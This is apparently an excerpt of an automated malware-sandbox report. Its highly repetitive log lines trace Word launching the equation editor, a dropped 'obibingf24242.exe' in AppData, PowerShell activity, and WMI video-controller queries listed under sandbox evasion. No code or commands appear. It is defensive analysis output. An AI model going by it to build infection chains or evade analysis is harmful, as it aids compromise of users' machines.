                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeMemory allocated: 200000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeMemory allocated: 2650000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeMemory allocated: C10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeMemory allocated: 58A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeMemory allocated: 5550000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeMemory allocated: 68A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeMemory allocated: 78A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeMemory allocated: 1C0000 memory reserve | memory write watchJump to behavior
